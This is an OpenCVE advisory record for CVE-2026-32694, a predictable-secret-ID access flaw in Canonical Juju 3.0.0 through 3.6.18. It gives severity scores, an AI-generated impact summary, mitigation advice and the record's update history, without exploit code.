Description
In Juju from version 3.0.0 through 3.6.18, when a secret owner grants permissions to a secret to a grantee, the secret owner relies exclusively on a predictable XID of the secret to verify ownership. This allows a malicious grantee which can request secrets to predict past secrets granted by the same secret owner to different grantees, allowing them to use the resources granted by those past secrets. Successful exploitation relies on a very specific configuration, specific data semantic, and the administrator having the need to deploy at least two different applications, one of them controlled by the attacker.
Published: 2026-03-18
Score: 6.6 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Unauthorized Secret Access
Action: Immediate Patch
AI Analysis

Impact

A vulnerability in Juju versions 3.0.0 through 3.6.18 allows a grantee that has permission to request secrets to leverage a predictable secret identifier (XID) and infer secrets that have been granted to other grantees by the same owner. This flaw is an instance of Improper Assertion of Permissions (CWE‑343) and Information Exposure Through Collection of Account Information (CWE‑639). The attacker can then use those inferred secrets to access resources and configurations that should be restricted, potentially leading to unauthorized configuration changes or data exposure.

Affected Systems

Canonical Juju 3.0.0 through 3.6.18 are affected. No other vendors or product versions are listed as impacted in the CNA data.

Risk and Exploitability

The CVSS score of 6.6 indicates moderate severity, while an EPSS score of less than 1% suggests that exploitation attempts are currently rare. The vulnerability is not listed in CISA’s KEV catalog. Exploitation requires that the attacker be a grantee with permission to request secrets, that a system administrator has deployed at least two separate applications (one under attacker control), and that the attacker can generate or request secrets using the predictable XID pattern. Therefore the attack vector is constrained but still poses a tangible risk of unauthorized secret access.

Generated by OpenCVE AI on March 19, 2026 at 17:23 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply Canonical’s official patch or upgrade Juju to a version newer than 3.6.18.
  • If an immediate patch is unavailable, remove the “grant permissions” capability from attacker-controlled applications so they cannot request or list secrets.
  • Continuously monitor Canonical’s security advisories for updated patches and apply them promptly.

Generated by OpenCVE AI on March 19, 2026 at 17:23 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-5cj2-rqqf-hx9p Juju affected by Confused Deputy IDOR attack via Predictable user specified ID in Juju Secrets
History

Thu, 19 Mar 2026 15:15:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*

Thu, 19 Mar 2026 09:45:00 +0000

Type Values Removed Values Added
First Time appeared Canonical
Canonical juju
Vendors & Products Canonical
Canonical juju

Wed, 18 Mar 2026 14:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Wed, 18 Mar 2026 13:45:00 +0000

Type Values Removed Values Added
Description In Juju from version 3.0.0 through 3.6.18, when a secret owner grants permissions to a secret to a grantee, the secret owner relies exclusively on a predictable XID of the secret to verify ownership. This allows a malicious grantee which can request secrets to predict past secrets granted by the same secret owner to different grantees, allowing them to use the resources granted by those past secrets. Successful exploitation relies on a very specific configuration, specific data semantic, and the administrator having the need to deploy at least two different applications, one of them controlled by the attacker.
Title Insecure Direct Object Reference attack via predictable secret ID in Juju
Weaknesses CWE-343
CWE-639
References
Metrics cvssV3_1

{'score': 6.6, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H'}

Subscriptions

Canonical Juju
cve-icon MITRE

Status: PUBLISHED

Assigner: canonical

Published:

Updated: 2026-03-18T13:40:33.981Z

Reserved: 2026-03-13T12:53:34.544Z

Link: CVE-2026-32694

cve-icon Vulnrichment

Updated: 2026-03-18T13:40:00.568Z

cve-icon NVD

Status : Analyzed

Published: 2026-03-18T14:16:40.503

Modified: 2026-03-19T15:05:34.183

Link: CVE-2026-32694

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-03-24T10:58:47Z

Weaknesses